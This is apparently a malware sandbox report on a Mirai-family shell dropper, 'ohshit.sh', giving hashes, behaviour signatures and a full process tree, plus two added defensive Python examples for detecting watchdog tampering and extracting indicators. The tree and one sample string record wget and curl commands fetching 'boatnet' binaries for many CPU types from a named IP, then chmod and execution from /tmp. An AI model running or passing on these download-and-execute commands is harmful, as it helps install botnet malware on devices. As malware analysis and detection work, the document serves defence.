Analysis
  max time kernel:   59s
  max time network:  65s
  platform:          ubuntu-20.04_amd64
  resource:          ubuntu2004-amd64-20240729-en
  resource tags:     arch:amd64, arch:i386, image:ubuntu2004-amd64-20240729-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  submitted:         31-08-2024 21:05
Tasks
  static1       static task       sample: ohshit.sh
  behavioral1   behavioral task   sample: ohshit.sh   resource: debian12-armhf-20240418-en
  behavioral2   behavioral task   sample: ohshit.sh   resource: debian12-mipsel-20240729-en
  behavioral3   behavioral task   sample: ohshit.sh   resource: debian9-armhf-20240611-en
  behavioral4   behavioral task   sample: ohshit.sh   resource: debian9-mipsbe-20240611-en
  behavioral5   behavioral task   sample: ohshit.sh   resource: debian9-mipsel-20240611-en
  behavioral6   behavioral task   sample: ohshit.sh   resource: ubuntu1804-amd64-20240508-en
  behavioral7   behavioral task   sample: ohshit.sh   resource: ubuntu2004-amd64-20240729-en   (the run reported on this page)
  behavioral8   behavioral task   sample: ohshit.sh   resource: ubuntu2204-amd64-20240611-en
General
  Target:  ohshit.sh
  Size:    2KB
  MD5:     fefdf2b7ece4d55bd47778b420f84011
  SHA1:    2823096e0538910f9b57ff9bae007ec655520fc3
  SHA256:  3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
  SHA512:  b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
  Extracted: mirai
  Extracted string: LZRD
Signatures

Executes dropped EXE (14 IoCs)
  /tmp/WTF executed as process WTF with PIDs 1440, 1449, 1458, 1467, 1476, 1534, 1562, 1573, 1582, 1591, 1602, 1611, 1620, 1639.

Modifies Watchdog functionality (1 TTP, 28 IoCs)
  Mirai-family bots open the hardware watchdog device node and disable it so the watchdog cannot reboot a device the bot has made unresponsive; a reboot would clear the memory-resident infection. Opening the node for writing is the observable step. A legitimate watchdog daemon also opens /dev/watchdog for writing, so the indicator is who does it, here a binary executed out of /tmp.
  File opened for modification by WTF:
    /dev/misc/watchdog   14 times
    /dev/watchdog        14 times

YARA rule match: upx (1 IoC)
  resource behavioral7/files/fstream-1.dat

Enumerates running processes
  Discovers information about currently running processes on the system.

Writes file to system bin folder (1 TTP, 28 IoCs)
  File opened for modification by WTF:
    /sbin/watchdog   14 times
    /bin/watchdog    14 times
  The counts match the 14 WTF instances. The report records the open attempts; whether these paths existed on the Ubuntu image is not shown.

Reads runtime system information (64 IoCs)
  Reads data from the /proc virtual filesystem.
  File opened for reading by WTF: /proc/<pid>/status for the following PIDs, in report order (some repeated):
    78, 443, 1548, 1493, 1319, 536, 995, 1124, 1570, 163, 1086, 1514, 1528, 1605, 1485, 301, 1522, 22, 76, 1503, 761, 75, 1123, 12, 1551, 1074, 22, 16, 1052, 1454, 800, 1487, 22, 1074, 1546, 497, 1082, 71, 89, 1122, 1454, 1461, 808, 1570, 2, 1574, 616, 505, 1548, 636, 761, 827, 1481, 1088, 175, 176, 1494, 70, 1435, 480, 1597, 952, 538, 1508

Writes file to tmp directory (28 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification:
    by wget:      /tmp/boatnet.mpsl, /tmp/boatnet.arm5, /tmp/boatnet.arm6, /tmp/boatnet.spc, /tmp/boatnet.x86, /tmp/boatnet.mips, /tmp/boatnet.arc, /tmp/boatnet.x86_64, /tmp/boatnet.ppc, /tmp/boatnet.arm, /tmp/boatnet.arm7, /tmp/boatnet.m68k, /tmp/boatnet.sh4
    by curl:      /tmp/boatnet.arm, /tmp/boatnet.x86, /tmp/boatnet.arc, /tmp/boatnet.arm5, /tmp/boatnet.mips, /tmp/boatnet.i686, /tmp/boatnet.mpsl, /tmp/boatnet.spc, /tmp/boatnet.m68k, /tmp/boatnet.i468, /tmp/boatnet.x86_64, /tmp/boatnet.ppc, /tmp/boatnet.arm7, /tmp/boatnet.arm6
    by ohshit.sh: /tmp/WTF (the shell itself opens the file, consistent with the output redirect of the cat boatnet.x86 step in the process tree)
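The two watchdog signatures above are only meaningful together with the identity of the process: a real watchdog daemon writes to /dev/watchdog all day, and a package manager may legitimately replace /sbin/watchdog. The following is an added detection example, not code from the report or from the malware. It takes file-access events in a shape of this example's own (pid, executable image, opened path, access mode) and flags a process whose executable lives in a drop directory when it opens a watchdog device node or a watchdog binary for writing, then correlates the two per PID, which is the combination the report shows for every /tmp/WTF instance. The sample events are constructed to mirror the report's rows plus two benign writers; the rule names and helper names are assumptions.

```python
"""Detect watchdog tampering by a binary running out of a drop directory.

Added example, not part of the sandbox report. Event shape, rule names and
function names are this example's own; the sample events are constructed.
"""
from dataclasses import dataclass

# Device nodes through which the kernel watchdog is fed or disabled.
WATCHDOG_DEVICES = {"/dev/watchdog", "/dev/watchdog0", "/dev/misc/watchdog"}
# Userland watchdog binaries the report shows being opened for modification.
WATCHDOG_BINARIES = {"/bin/watchdog", "/sbin/watchdog", "/usr/sbin/watchdog"}
# World-writable locations a dropper typically executes from.
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

RULE_DEVICE = "watchdog_device_opened_for_write"
RULE_BINARY = "watchdog_binary_opened_for_write"


@dataclass(frozen=True)
class FileEvent:
    pid: int
    image: str   # full path of the executable that performed the open
    path: str    # file or device node that was opened
    mode: str    # "read" or "write"


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    rule: str
    path: str


def runs_from_drop_dir(image: str) -> bool:
    return image.startswith(DROP_DIRS)


def classify(event: FileEvent):
    """Name the rule an event matches on path and mode alone, or None."""
    if event.mode != "write":
        return None
    if event.path in WATCHDOG_DEVICES:
        return RULE_DEVICE
    if event.path in WATCHDOG_BINARIES:
        return RULE_BINARY
    return None


def detect(events):
    """Findings for drop-directory processes only; a daemon in /usr/sbin is ignored."""
    return [
        Finding(e.pid, e.image, rule, e.path)
        for e in events
        if (rule := classify(e)) and runs_from_drop_dir(e.image)
    ]


def rules_by_pid(events):
    """PID -> set of rule names it triggered."""
    out = {}
    for f in detect(events):
        out.setdefault(f.pid, set()).add(f.rule)
    return out


def watchdog_kill_pattern(events):
    """PIDs that both wrote to the device node and touched the watchdog binary."""
    return sorted(pid for pid, rules in rules_by_pid(events).items()
                  if {RULE_DEVICE, RULE_BINARY} <= rules)


# Constructed events: two WTF instances using PIDs from the report, plus two
# benign writers that must not be flagged.
SAMPLE_EVENTS = [
    FileEvent(1440, "/tmp/WTF", "/dev/misc/watchdog", "write"),
    FileEvent(1440, "/tmp/WTF", "/dev/watchdog", "write"),
    FileEvent(1440, "/tmp/WTF", "/sbin/watchdog", "write"),
    FileEvent(1440, "/tmp/WTF", "/bin/watchdog", "write"),
    FileEvent(1449, "/tmp/WTF", "/dev/watchdog", "write"),
    FileEvent(1449, "/tmp/WTF", "/proc/22/status", "read"),
    FileEvent(612, "/usr/sbin/watchdog", "/dev/watchdog", "write"),  # real daemon feeding the watchdog
    FileEvent(903, "/usr/bin/dpkg", "/sbin/watchdog", "write"),      # package manager upgrading it
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid} {f.image}: {f.rule} ({f.path})")
    print("watchdog kill pattern:", watchdog_kill_pattern(SAMPLE_EVENTS))
```

On real hosts the events would come from auditd (open/openat records with the exe field) or an EDR file-access stream; the drop-directory test is what keeps the legitimate daemon out of the findings, and the per-PID correlation is what separates a misconfigured tool that touches one path from a bot that does both.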
Processes

How to read the tree: every process below the root is spawned by the script (PID 1396). For each target CPU the script fetches http://94.156.71.225/hiddenbin/boatnet.<arch> with wget and again with curl -O, runs chmod, then executes /tmp/WTF. Only one cat appears (PID 1438, on boatnet.x86) and /tmp/WTF is recorded as written once by ohshit.sh, so all fourteen ./WTF executions run the same x86 copy; the other architectures' files land in /tmp (they show up in later chmod argument lists) but no /tmp/boatnet.* process ever appears in this amd64 run. Each chmod's argument list is the full sorted contents of /tmp at that moment, sandbox systemd-private-*, ssh-* and snap-private-tmp entries included, consistent with an unquoted chmod +x * run inside /tmp.

/tmp/ohshit.sh (PID 1396): /tmp/ohshit.sh
    signatures: Writes file to tmp directory

  /usr/bin/wget (PID 1397): wget http://94.156.71.225/hiddenbin/boatnet.x86
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1402): curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      signatures: Writes file to tmp directory
  /usr/bin/cat (PID 1438): cat boatnet.x86
  /usr/bin/chmod (PID 1439): chmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1440): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1444): wget http://94.156.71.225/hiddenbin/boatnet.mips
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1446): curl -O http://94.156.71.225/hiddenbin/boatnet.mips
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1448): chmod +x boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1449): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1453): wget http://94.156.71.225/hiddenbin/boatnet.arc
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1455): curl -O http://94.156.71.225/hiddenbin/boatnet.arc
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1457): chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1458): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1462): wget http://94.156.71.225/hiddenbin/boatnet.i468
  /usr/bin/curl (PID 1464): curl -O http://94.156.71.225/hiddenbin/boatnet.i468
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1466): chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1467): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1471): wget http://94.156.71.225/hiddenbin/boatnet.i686
  /usr/bin/curl (PID 1473): curl -O http://94.156.71.225/hiddenbin/boatnet.i686
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1475): chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1476): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1480): wget http://94.156.71.225/hiddenbin/boatnet.x86_64
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1531): curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1533): chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1534): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1538): wget http://94.156.71.225/hiddenbin/boatnet.mpsl
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1540): curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1561): chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1562): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1566): wget http://94.156.71.225/hiddenbin/boatnet.arm
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1569): curl -O http://94.156.71.225/hiddenbin/boatnet.arm
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1572): chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1573): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1577): wget http://94.156.71.225/hiddenbin/boatnet.arm5
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1579): curl -O http://94.156.71.225/hiddenbin/boatnet.arm5
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1581): chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1582): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1586): wget http://94.156.71.225/hiddenbin/boatnet.arm6
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1588): curl -O http://94.156.71.225/hiddenbin/boatnet.arm6
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1590): chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1591): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1595): wget http://94.156.71.225/hiddenbin/boatnet.arm7
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1597): curl -O http://94.156.71.225/hiddenbin/boatnet.arm7
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1601): chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1602): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1606): wget http://94.156.71.225/hiddenbin/boatnet.ppc
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1608): curl -O http://94.156.71.225/hiddenbin/boatnet.ppc
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1610): chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1611): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1615): wget http://94.156.71.225/hiddenbin/boatnet.spc
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1617): curl -O http://94.156.71.225/hiddenbin/boatnet.spc
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1619): chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1620): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1624): wget http://94.156.71.225/hiddenbin/boatnet.m68k
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1633): curl -O http://94.156.71.225/hiddenbin/boatnet.m68k
      signatures: Writes file to tmp directory
  /usr/bin/chmod (PID 1638): chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
  /tmp/WTF (PID 1639): ./WTF
      signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1643): wget http://94.156.71.225/hiddenbin/boatnet.sh4
      signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1648): curl -O http://94.156.71.225/hiddenbin/boatnet.sh4
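Most of the value of a tree like the one above is in what can be pulled out of it mechanically: the payload host, the list of architectures the operator built for, the wget-then-curl fallback, how many times the dropped binary ran, and the fact that chmod hit the whole directory. The following is an added example, not code from the report or from the malware. It works over a constructed transcription of part of the process list into rows of the form pid, image, command line separated by tabs (three of the fifteen architectures are included); that row format and every function name are this example's own.

```python
"""Recover dropper indicators from a sandbox process tree.

Added example, not part of the report. The row format below and the
function names are assumptions of this example; SAMPLE_TREE is a
constructed excerpt of the report's process rows.
"""
import re
from dataclasses import dataclass
from posixpath import basename
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
DROP_DIR = "/tmp/"

# Constructed excerpt: pid<TAB>executable image<TAB>command line.
SAMPLE_TREE = """\
1396\t/tmp/ohshit.sh\t/tmp/ohshit.sh
1397\t/usr/bin/wget\twget http://94.156.71.225/hiddenbin/boatnet.x86
1402\t/usr/bin/curl\tcurl -O http://94.156.71.225/hiddenbin/boatnet.x86
1438\t/usr/bin/cat\tcat boatnet.x86
1439\t/usr/bin/chmod\tchmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF
1440\t/tmp/WTF\t./WTF
1444\t/usr/bin/wget\twget http://94.156.71.225/hiddenbin/boatnet.mips
1446\t/usr/bin/curl\tcurl -O http://94.156.71.225/hiddenbin/boatnet.mips
1449\t/tmp/WTF\t./WTF
1595\t/usr/bin/wget\twget http://94.156.71.225/hiddenbin/boatnet.arm7
1597\t/usr/bin/curl\tcurl -O http://94.156.71.225/hiddenbin/boatnet.arm7
1602\t/tmp/WTF\t./WTF
"""


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str

    @property
    def tool(self) -> str:
        return basename(self.image)


def parse_tree(text: str):
    rows = (line.split("\t", 2) for line in text.splitlines() if line.strip())
    return [Proc(int(pid), image, cmd) for pid, image, cmd in rows]


def fetch_tools_by_url(procs):
    """URL -> sorted list of downloader tools that requested it."""
    tools = {}
    for p in procs:
        if p.tool in DOWNLOADERS:
            for url in URL_RE.findall(p.cmdline):
                tools.setdefault(url, set()).add(p.tool)
    return {u: sorted(t) for u, t in tools.items()}


def download_urls(procs):
    return sorted(fetch_tools_by_url(procs))


def payload_hosts(urls):
    return sorted({urlparse(u).hostname for u in urls})


def payload_names(urls):
    return sorted({basename(urlparse(u).path) for u in urls})


def arch_suffixes(urls):
    """'boatnet.x86_64' -> 'x86_64': the CPU targets the operator built for."""
    return sorted({n.split(".", 1)[1] for n in payload_names(urls) if "." in n})


def dropped_exe_runs(procs):
    """PIDs executing a binary out of the drop directory (the script itself excluded)."""
    return [p.pid for p in procs if p.image.startswith(DROP_DIR) and not p.image.endswith(".sh")]


def blanket_chmod(procs, names):
    """chmod PID -> targets that were never downloaded. A non-empty list means the
    mode change hit more than the payloads, which is what an unquoted chmod +x * does."""
    out = {}
    for p in procs:
        if p.tool != "chmod":
            continue
        targets = [a for a in p.cmdline.split()[1:] if not a.startswith(("-", "+"))]
        stray = sorted(t for t in targets if t not in names)
        if stray:
            out[p.pid] = stray
    return out


def iocs(procs):
    by_url = fetch_tools_by_url(procs)
    urls = sorted(by_url)
    return {
        "hosts": payload_hosts(urls),
        "urls": urls,
        "arches": arch_suffixes(urls),
        "fallback_urls": sorted(u for u, t in by_url.items() if len(t) > 1),
        "dropped_exe_runs": len(dropped_exe_runs(procs)),
        "blanket_chmod_pids": sorted(blanket_chmod(procs, set(payload_names(urls)))),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(iocs(parse_tree(SAMPLE_TREE)), indent=2))
```

Run against the full tree, the same functions give the complete URL set for blocking, the fifteen architecture suffixes, all fourteen WTF executions, and every chmod PID; the stray-target check is also a cheap way to spot the same dropper when the payload names change but the chmod +x * habit does not.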
-
Network
MITRE ATT&CK Enterprise v15
Downloads
  Filesize: 36KB
  MD5:      ba2cb5b8715ba94c39e24e75a34d0ea0
  SHA1:     7182bf3b0e14e5224e741c15174c6e93f00df444
